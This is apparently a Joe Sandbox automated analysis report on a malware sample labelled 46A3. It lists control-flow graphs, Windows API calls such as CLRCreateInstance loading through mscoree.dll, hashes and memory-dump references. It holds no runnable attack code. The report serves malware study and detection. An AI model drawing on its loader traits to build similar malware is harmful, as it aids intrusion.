60203->60204 60205 1130898 60204->60205 60207 1131356 60204->60207 60208 1131365 60207->60208 60209 113128d 60208->60209 60213 1139a40 60208->60213 60219 1139ab0 60208->60219 60224 1139a60 60208->60224 60209->60205 60214 1139a45 60213->60214 60215 1139a6e 60214->60215 60230 1139ad9 60214->60230 60235 1139ae8 60214->60235 60215->60209 60216 1139ace 60216->60209 60220 1139ac0 60219->60220 60222 1139ad9 343 API calls 60220->60222 60223 1139ae8 343 API calls 60220->60223 60221 1139ace 60221->60209 60222->60221 60223->60221 60225 1139ac0 60224->60225 60226 1139a6e 60224->60226 60228 1139ad9 343 API calls 60225->60228 60229 1139ae8 343 API calls 60225->60229 60226->60209 60227 1139ace 60227->60209 60228->60227 60229->60227 60231 1139af9 60230->60231 60232 1139aff 60231->60232 60240 1139b70 60231->60240 60245 1139b80 60231->60245 60232->60216 60236 1139af9 60235->60236 60237 1139aff 60236->60237 60238 1139b70 343 API calls 60236->60238 60239 1139b80 343 API calls 60236->60239 60237->60216 60238->60237 60239->60237 60241 1139b9c 60240->60241 60250 1139c18 60241->60250 60259 1139c28 60241->60259 60242 1139bf6 60242->60232 60246 1139b9c 60245->60246 60248 1139c18 343 API calls 60246->60248 60249 1139c28 343 API calls 60246->60249 60247 1139bf6 60247->60232 60248->60247 60249->60247 60252 1139c39 60250->60252 60253 1139cb9 60250->60253 60251 1139d4b 60251->60242 60252->60242 60253->60251 60254 1139c28 343 API calls 60253->60254 60255 1139df4 60254->60255 60256 1139e12 60255->60256 60257 113a469 343 API calls 60255->60257 60258 113a478 343 API calls 60255->60258 60256->60242 60257->60256 60258->60256 60261 1139c39 60259->60261 60262 1139cb9 60259->60262 60260 1139d4b 60260->60242 60261->60242 60262->60260 60263 1139c28 343 API calls 60262->60263 60264 1139df4 60263->60264 60265 1139e12 60264->60265 60266 113a469 343 API calls 60264->60266 60267 113a478 343 API calls 60264->60267 60265->60242 60266->60265 60267->60265

                                                                                                          Executed Functions

                                                                                                          Function 6F04B6B0 Relevance: 35.2, APIs: 23, Instructions: 669COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 720 6f04b6b0-6f04b758 VariantInit * 2 721 6f04b764-6f04b769 720->721 722 6f04b75a-6f04b75f call 6f09c1e0 720->722 724 6f04b773-6f04b784 721->724 725 6f04b76b-6f04b770 721->725 722->721 727 6f04be96-6f04beb4 VariantClear * 2 724->727 728 6f04b78a-6f04b791 724->728 725->724 729 6f04beb6-6f04bebb 727->729 730 6f04bebe-6f04beca 727->730 731 6f04b793-6f04b798 728->731 732 6f04b7b9-6f04b7e2 SafeArrayCreateVector 728->732 729->730 733 6f04bed4-6f04bef2 call 6f08948b 730->733 734 6f04becc-6f04bed1 730->734 735 6f04b7a2-6f04b7b3 731->735 736 6f04b79a-6f04b79f 731->736 737 6f04b7e4-6f04b7e7 732->737 738 6f04b7ec-6f04b809 SafeArrayPutElement VariantClear 732->738 734->733 735->727 735->732 736->735 737->738 739 6f04be85-6f04be8d 738->739 740 6f04b80f-6f04b81d 738->740 739->727 742 6f04be8f-6f04be90 SafeArrayDestroy 739->742 743 6f04b81f-6f04b824 call 6f09c1e0 740->743 744 6f04b829-6f04b837 740->744 742->727 743->744 865 6f04b83d call d1d149 744->865 866 6f04b83d call d1d148 744->866 748 6f04b83f-6f04b841 748->739 749 6f04b847-6f04b853 748->749 749->739 750 6f04b859-6f04b85e 749->750 750->739 751 6f04b864-6f04b86b 750->751 752 6f04b871-6f04b87e 751->752 753 6f04b913-6f04b917 751->753 756 6f04b880-6f04b882 752->756 757 6f04b888-6f04b8ea call 6f04dbc0 call 6f045790 call 6f04c850 752->757 754 6f04b921-6f04b941 call 6f03dcd0 753->754 755 6f04b919-6f04b91b 753->755 754->739 763 6f04b947-6f04b964 call 6f03dcd0 754->763 755->739 755->754 756->739 756->757 769 6f04b8ef-6f04b8f8 757->769 763->739 768 6f04b96a-6f04b96d 763->768 770 6f04b993-6f04b9bf 768->770 771 6f04b96f-6f04b98d call 6f03dcd0 768->771 772 6f04b904-6f04b90e call 6f04e800 769->772 773 6f04b8fa-6f04b8ff call 6f04e800 769->773 776 6f04b9c1-6f04b9c6 call 6f09c1e0 770->776 777 6f04b9cb-6f04ba1d VariantClear 770->777 771->739 771->770 772->770 783 6f04be83 773->783 776->777 777->739 785 6f04ba23-6f04ba31 777->785 783->739 786 6f04ba33-6f04ba38 call 6f09c1e0 785->786 787 6f04ba3d-6f04ba8b 785->787 786->787 787->739 790 6f04ba91-6f04ba95 787->790 790->739 791 6f04ba9b-6f04baa7 call 6f089bb5 790->791 794 6f04bab6 791->794 795 6f04baa9-6f04bab4 791->795 796 6f04bab8-6f04bacc call 6f04bf00 794->796 795->796 796->739 799 6f04bad2-6f04bada 796->799 800 6f04baf3-6f04baf8 799->800 801 6f04badc-6f04baed call 6f0447d0 799->801 802 6f04bb11-6f04bb2e call 6f0449b0 800->802 803 6f04bafa-6f04bb0b call 6f0447d0 800->803 801->739 801->800 802->739 810 6f04bb34-6f04bb4b call 6f04cd20 802->810 803->739 803->802 810->739 813 6f04bb51-6f04bb8e call 6f045790 call 6f044170 810->813 818 6f04bb90-6f04bb95 call 6f04e800 813->818 819 6f04bb9a-6f04bba8 call 6f04e800 813->819 818->783 824 6f04bca2 819->824 825 6f04bbae-6f04bbc0 819->825 827 6f04bca8-6f04bcae 824->827 825->824 826 6f04bbc6-6f04bc5b call 6f03c4a0 VariantInit * 2 SafeArrayCreateVector SafeArrayPutElement VariantClear call 6f04db10 825->826 840 6f04bc60-6f04bc75 826->840 828 6f04bcb4-6f04bcc6 827->828 829 6f04bd78-6f04bdc8 827->829 828->829 831 6f04bccc-6f04bd76 call 6f03c4a0 VariantInit * 2 SafeArrayCreateVector SafeArrayPutElement VariantClear call 6f04db10 VariantClear * 2 828->831 829->783 841 6f04bdce-6f04bdd7 829->841 831->829 843 6f04bc77-6f04bc8d 840->843 844 6f04bc90-6f04bca0 VariantClear * 2 840->844 841->783 845 6f04bddd-6f04bde4 841->845 843->844 844->827 845->783 847 6f04bdea-6f04be03 call 6f089bb5 845->847 850 6f04be05-6f04be10 call 6f03c4a0 847->850 851 6f04be12 847->851 853 6f04be14-6f04be3c 850->853 851->853 855 6f04be3e-6f04be50 853->855 856 6f04be7f 853->856 855->856 857 6f04be52-6f04be65 call 6f089bb5 855->857 856->783 860 6f04be67-6f04be6f call 6f03c4a0 857->860 861 6f04be71 857->861 863 6f04be73-6f04be7c 860->863 861->863 863->856 865->748 866->748
                                                                                                          APIs
                                                                                                          • VariantInit.OLEAUT32(?), ref: 6F04B73F
                                                                                                          • VariantInit.OLEAUT32(?), ref: 6F04B748
                                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6F04B7BE
                                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6F04B7F5
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F04B801
                                                                                                            • Part of subcall function 6F04C850: VariantInit.OLEAUT32(?), ref: 6F04C88F
                                                                                                            • Part of subcall function 6F04C850: VariantInit.OLEAUT32(?), ref: 6F04C895
                                                                                                            • Part of subcall function 6F04C850: SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6F04C8A0
                                                                                                            • Part of subcall function 6F04C850: SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6F04C8D5
                                                                                                            • Part of subcall function 6F04C850: VariantClear.OLEAUT32(?), ref: 6F04C8E1
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F04BA15
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04BE90
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F04BEA3
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F04BEA9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$ArrayClearSafe$Init$CreateElementVector$Destroy
                                                                                                          • String ID:
                                                                                                          • API String ID: 2012514194-0
                                                                                                          • Opcode ID: 202b4a7524171b3265607475697c6b06c1e3603ece22ea8910e4b6a557df4729
                                                                                                          • Instruction ID: 204978d05f03f731a36c41c75f7f77c945e7bb1d562b1fad2ed29ff2cfa0b823
                                                                                                          • Opcode Fuzzy Hash: 202b4a7524171b3265607475697c6b06c1e3603ece22ea8910e4b6a557df4729
                                                                                                          • Instruction Fuzzy Hash: 81524EB5900218DFDB14DFA8C880BDDBBF6BF89314F1481A9E919AB351DB70A945CF90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 05940EB3 Relevance: 23.3, Strings: 18, Instructions: 800COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1077 5940eb3-5940ece 1079 5940ed4-5940ee6 1077->1079 1080 59419bb-59419bf 1077->1080 1086 5940f15-5940f36 1079->1086 1087 5940ee8-5940f0a 1079->1087 1081 59419c1-59419cd 1080->1081 1082 59419d2-5941a58 1080->1082 1084 5941ee8-5941ef5 1081->1084 1099 5941a82 1082->1099 1100 5941a5a-5941a66 1082->1100 1091 5940f3c-5940f52 1086->1091 1087->1086 1087->1091 1092 5940f54-5940f58 1091->1092 1093 5940f5e-5941042 1091->1093 1092->1080 1092->1093 1114 5941044-5941050 1093->1114 1115 594106c 1093->1115 1104 5941a88-5941acd 1099->1104 1102 5941a70-5941a76 1100->1102 1103 5941a68-5941a6e 1100->1103 1105 5941a80 1102->1105 1103->1105 1234 5941ad0 call 59552b0 1104->1234 1235 5941ad0 call 59552b8 1104->1235 1105->1104 1108 5941ad2-5941adf 1110 5941ae5-5941b0e 1108->1110 1111 5941ae1 1108->1111 1116 5941b14-5941b40 1110->1116 1117 5941c40-5941c47 1110->1117 1111->1110 1119 5941052-5941058 1114->1119 1120 594105a-5941060 1114->1120 1118 5941072-5941124 1115->1118 1128 5941b47-5941b82 1116->1128 1129 5941b42 1116->1129 1121 5941c4d-5941d4c 1117->1121 1122 5941d4f-5941db0 1117->1122 1141 5941126-5941132 1118->1141 1142 594114e 1118->1142 1123 594106a 1119->1123 1120->1123 1121->1122 1122->1084 1123->1118 1128->1117 1129->1128 1144 5941134-594113a 1141->1144 1145 594113c-5941142 1141->1145 1146 5941154-594116f 1142->1146 1147 594114c 1144->1147 1145->1147 1150 5941171-594117d 1146->1150 1151 5941199 1146->1151 1147->1146 1153 5941187-594118d 1150->1153 1154 594117f-5941185 1150->1154 1155 594119f-59411bd 1151->1155 1157 5941197 1153->1157 1154->1157 1160 59411c3-59412c3 1155->1160 1161 59412db-59413bf 1155->1161 1157->1155 1160->1161 1174 59413c1-59413cd 1161->1174 1175 59413e9 1161->1175 1178 59413d7-59413dd 1174->1178 1179 59413cf-59413d5 1174->1179 1176 59413ef-5941444 1175->1176 1187 5941562-5941638 1176->1187 1188 594144a-5941549 1176->1188 1181 59413e7 1178->1181 1179->1181 1181->1176 1187->1080 1197 594163e-5941647 1187->1197 1188->1187 1199 5941652-5941751 1197->1199 1200 5941649-594164c 1197->1200 1201 594176a-5941781 1199->1201 1200->1199 1200->1201 1201->1080 1207 5941787-5941898 1201->1207 1223 59418a3-59419a2 1207->1223 1224 594189a-594189d 1207->1224 1223->1080 1224->1080 1224->1223 1234->1108 1235->1108
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985194457.0000000005940000.00000040.00000800.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_5940000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: HERE$HERE$HERE$HERE$HERE$HERE$HERE$LOOK$LOOK$LOOK$LOOK$LOOK$LOOK$LOOK$p<{q$p<{q$p<{q$p<{q
                                                                                                          • API String ID: 0-1111880270
                                                                                                          • Opcode ID: 7f3339b068a016c753d229c2ad3f6d9b77564195858c926e7150ee68decc858e
                                                                                                          • Instruction ID: 2cbcb94700caef4abd5724692b4cddb59d305e61088ba4ccca3c256a05807d02
                                                                                                          • Opcode Fuzzy Hash: 7f3339b068a016c753d229c2ad3f6d9b77564195858c926e7150ee68decc858e
                                                                                                          • Instruction Fuzzy Hash: 08829474E002298FDB64DF69C984BE9BBB2BB88310F1485E9D50DAB355DB349E81CF50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F03B6C0 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 245libraryloaderCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1481 6f03b6c0-6f03b715 GetModuleHandleW 1482 6f03b717-6f03b724 LoadLibraryW 1481->1482 1483 6f03b72a-6f03b738 GetProcAddress 1481->1483 1482->1483 1484 6f03b94c-6f03b954 1482->1484 1483->1484 1485 6f03b73e-6f03b750 1483->1485 1486 6f03b956-6f03b95b 1484->1486 1487 6f03b95e-6f03b96a 1484->1487 1485->1484 1492 6f03b756-6f03b771 1485->1492 1486->1487 1489 6f03b974-6f03b98f call 6f08948b 1487->1489 1490 6f03b96c-6f03b971 1487->1490 1490->1489 1492->1484 1495 6f03b777-6f03b788 1492->1495 1495->1484 1497 6f03b78e-6f03b791 1495->1497 1497->1484 1498 6f03b797-6f03b7b2 1497->1498 1498->1484 1500 6f03b7b8-6f03b7c5 1498->1500 1500->1484 1502 6f03b7cb-6f03b7d0 1500->1502 1503 6f03b7d2-6f03b7d7 1502->1503 1504 6f03b7da-6f03b7e7 1502->1504 1503->1504 1505 6f03b7ec-6f03b7ee 1504->1505 1505->1484 1506 6f03b7f4-6f03b7f9 1505->1506 1507 6f03b805-6f03b80a 1506->1507 1508 6f03b7fb-6f03b800 call 6f09c1e0 1506->1508 1510 6f03b814-6f03b829 1507->1510 1511 6f03b80c-6f03b811 1507->1511 1508->1507 1510->1484 1513 6f03b82f-6f03b849 1510->1513 1511->1510 1514 6f03b850-6f03b85b 1513->1514 1514->1514 1515 6f03b85d-6f03b8a4 call 6f08a116 GetModuleHandleW 1514->1515 1515->1484 1518 6f03b8aa-6f03b8c1 1515->1518 1519 6f03b8c5-6f03b8d0 1518->1519 1519->1519 1520 6f03b8d2-6f03b8f0 GetProcAddress 1519->1520 1520->1484 1521 6f03b8f2-6f03b8ff call 6f025340 1520->1521 1525 6f03b900-6f03b905 1521->1525 1525->1525 1526 6f03b907-6f03b90d 1525->1526 1526->1525 1527 6f03b90f-6f03b912 1526->1527 1528 6f03b914-6f03b929 1527->1528 1529 6f03b93a 1527->1529 1530 6f03b931-6f03b938 1528->1530 1531 6f03b92b-6f03b92e 1528->1531 1532 6f03b93d-6f03b948 call 6f03ad80 1529->1532 1530->1532 1531->1530 1532->1484
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNEL32(mscoree.dll,F6D10407), ref: 6F03B711
                                                                                                          • LoadLibraryW.KERNEL32(mscoree.dll), ref: 6F03B71C
                                                                                                          • GetProcAddress.KERNEL32(00000000,CLRCreateInstance), ref: 6F03B730
                                                                                                          • __cftoe.LIBCMT ref: 6F03B870
                                                                                                          • GetModuleHandleW.KERNEL32(?), ref: 6F03B88B
                                                                                                          • GetProcAddress.KERNEL32(00000000,C8F5E518), ref: 6F03B8D7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressHandleModuleProc$LibraryLoad__cftoe
                                                                                                          • String ID: CLRCreateInstance$mscoree.dll$v4.0.30319
                                                                                                          • API String ID: 1275574042-506955582
                                                                                                          • Opcode ID: b9835a54369a05cc345fc410b219b342cfe6846afe8f4cd121f6c84ff25f7aec
                                                                                                          • Instruction ID: 6e297be4c947b94fce2f8fc8b463c607c774dfdb51cff6b83f31b378da66b1bd
                                                                                                          • Opcode Fuzzy Hash: b9835a54369a05cc345fc410b219b342cfe6846afe8f4cd121f6c84ff25f7aec
                                                                                                          • Instruction Fuzzy Hash: 12917DB1D0465A9FCB04DFE8C880AADBBB5FF49318F20856EE519EB254D730A906CB54
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 05942840 Relevance: 1.8, Strings: 1, Instructions: 576COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985194457.0000000005940000.00000040.00000800.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_5940000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (
                                                                                                          • API String ID: 0-3887548279
                                                                                                          • Opcode ID: e83c6a0546c76e3a1b38fb844b1ffb37d2e7a52f415601272a15dd49048826e6
                                                                                                          • Instruction ID: 15f0f7ce83588b422271647b65d3f3950b857193a36a7c425a0e751b950067d3
                                                                                                          • Opcode Fuzzy Hash: e83c6a0546c76e3a1b38fb844b1ffb37d2e7a52f415601272a15dd49048826e6
                                                                                                          • Instruction Fuzzy Hash: 4152D074A012288FDB68DF65C884BDDBBB2FF89301F1481E9D409A7295DB356E85CF50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0113C8A8 Relevance: .1, Instructions: 92COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.983923396.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_1130000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 1806e560006583df27abdc2f38e2cd56062d9117873a36e7b0e2dfc73e51b5c3
                                                                                                          • Instruction ID: 8a54f0cd3909e31b380d73c467698e4d988b6142f6c88c19590fd3f25794401c
                                                                                                          • Opcode Fuzzy Hash: 1806e560006583df27abdc2f38e2cd56062d9117873a36e7b0e2dfc73e51b5c3
                                                                                                          • Instruction Fuzzy Hash: 0531D275D01208AFDB05CFA8D850AEEFBB5FF49310F10906AE915B7360DB71AA05CB95
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0113C8B0 Relevance: .1, Instructions: 87COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.983923396.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_1130000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 47550dcb8c275abe010cc09fe780ca74856517b492118a4ebf124bef43532135
                                                                                                          • Instruction ID: 99bb651bafbe46ce5adea6f88032b871f44441340c4ca98a800f97afe7e650fc
                                                                                                          • Opcode Fuzzy Hash: 47550dcb8c275abe010cc09fe780ca74856517b492118a4ebf124bef43532135
                                                                                                          • Instruction Fuzzy Hash: 9331B275D01208AFDB05CFA8D850AEEFBB5FF49310F10906AE915B7360DB30AA04CBA5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F049357 Relevance: 41.0, APIs: 21, Strings: 1, Instructions: 2492COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6F0484BF
                                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F0484D2
                                                                                                          • SafeArrayGetElement.OLEAUT32 ref: 6F04850A
                                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6F0494C1
                                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F0494D4
                                                                                                          • SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 6F04950C
                                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6F0497A4
                                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F0497B7
                                                                                                          • SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 6F0497F2
                                                                                                            • Part of subcall function 6F043A90: SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6F043B71
                                                                                                            • Part of subcall function 6F043A90: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F043B83
                                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6F049D5F
                                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F049D72
                                                                                                          • SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 6F049DAF
                                                                                                            • Part of subcall function 6F043A90: SafeArrayDestroy.OLEAUT32(?), ref: 6F043BCF
                                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6F04A1BC
                                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F04A1CF
                                                                                                          • SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 6F04A20C
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE63
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE73
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE86
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE99
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AEAC
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AEBF
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArraySafe$Bound$Destroy$Element
                                                                                                          • String ID: A
                                                                                                          • API String ID: 959723449-3554254475
                                                                                                          • Opcode ID: 0dc4363048ff95cb997fa279a321f6ba85dae0ec005da1bb1c75c948af71928c
                                                                                                          • Instruction ID: 3ba41912049576fb3070f72bebc2c5664808f10c6a20e9fcd510a1dfc51fcb8c
                                                                                                          • Opcode Fuzzy Hash: 0dc4363048ff95cb997fa279a321f6ba85dae0ec005da1bb1c75c948af71928c
                                                                                                          • Instruction Fuzzy Hash: 1C23A175A00305EFDF00DFA8C984FDD77B9AF49308F6481A5E909AB296DB31E945CB60
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F042970 Relevance: 25.8, APIs: 17, Instructions: 335COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 867 6f042970-6f0429c1 868 6f0429c3-6f0429c8 call 6f09c1e0 867->868 869 6f0429cd-6f0429d7 867->869 868->869 935 6f0429d8 call d1d149 869->935 936 6f0429d8 call d1d148 869->936 871 6f0429da-6f0429dc 872 6f042d12-6f042d18 871->872 873 6f0429e2-6f0429e8 871->873 874 6f042d21-6f042d37 872->874 876 6f042d1a-6f042d1b SafeArrayDestroy 872->876 873->874 875 6f0429ee-6f042a1a SafeArrayGetLBound SafeArrayGetUBound 873->875 875->872 877 6f042a20-6f042a37 SafeArrayGetElement 875->877 876->874 877->872 878 6f042a3d-6f042a4d 877->878 878->868 879 6f042a53-6f042a66 878->879 933 6f042a67 call d1d149 879->933 934 6f042a67 call d1d148 879->934 880 6f042a69-6f042a6f 881 6f042a75-6f042a77 880->881 882 6f042d5a-6f042d5f 880->882 881->882 884 6f042a7d-6f042a92 call 6f0438e0 881->884 883 6f042c76-6f042c78 882->883 883->872 886 6f042c7e-6f042c86 883->886 888 6f042c58-6f042c63 884->888 889 6f042a98-6f042aac 884->889 886->872 893 6f042c65-6f042c6a 888->893 894 6f042c6d-6f042c72 888->894 891 6f042ab6-6f042acc VariantInit 889->891 892 6f042aae-6f042ab3 889->892 891->868 895 6f042ad2-6f042ae3 891->895 892->891 893->894 894->883 896 6f042ae5-6f042ae7 895->896 897 6f042ae9-6f042aeb 895->897 898 6f042aee-6f042af2 896->898 897->898 899 6f042af4-6f042af6 898->899 900 6f042af8 898->900 901 6f042afa-6f042b34 899->901 900->901 903 6f042b3a-6f042b50 VariantInit 901->903 904 6f042c8b-6f042caa VariantClear * 2 901->904 903->868 905 6f042b56-6f042b67 903->905 904->894 906 6f042cac-6f042cb4 904->906 907 6f042b6d-6f042b6f 905->907 908 6f042b69-6f042b6b 905->908 906->894 909 6f042b72-6f042b76 907->909 908->909 911 6f042b7c 909->911 912 6f042b78-6f042b7a 909->912 913 6f042b7e-6f042bb8 911->913 912->913 915 6f042bbe-6f042bcb 913->915 916 6f042d3a-6f042d55 VariantClear * 3 913->916 915->916 917 6f042bd1-6f042bec call 6f053160 915->917 916->888 920 6f042bf1-6f042bf3 917->920 921 6f042cb6-6f042cf1 VariantClear * 3 920->921 922 6f042bf9-6f042c1f VariantClear * 3 920->922 929 6f042cf3-6f042cf6 921->929 930 6f042cfb-6f042d06 921->930 923 6f042c21-6f042c26 922->923 924 6f042c29-6f042c34 922->924 923->924 925 6f042c36-6f042c3b 924->925 926 6f042c3e-6f042c4d 924->926 925->926 926->877 928 6f042c53 926->928 928->872 929->930 931 6f042d10 930->931 932 6f042d08-6f042d0d 930->932 931->872 932->931 933->880 934->880 935->871 936->871
                                                                                                          APIs
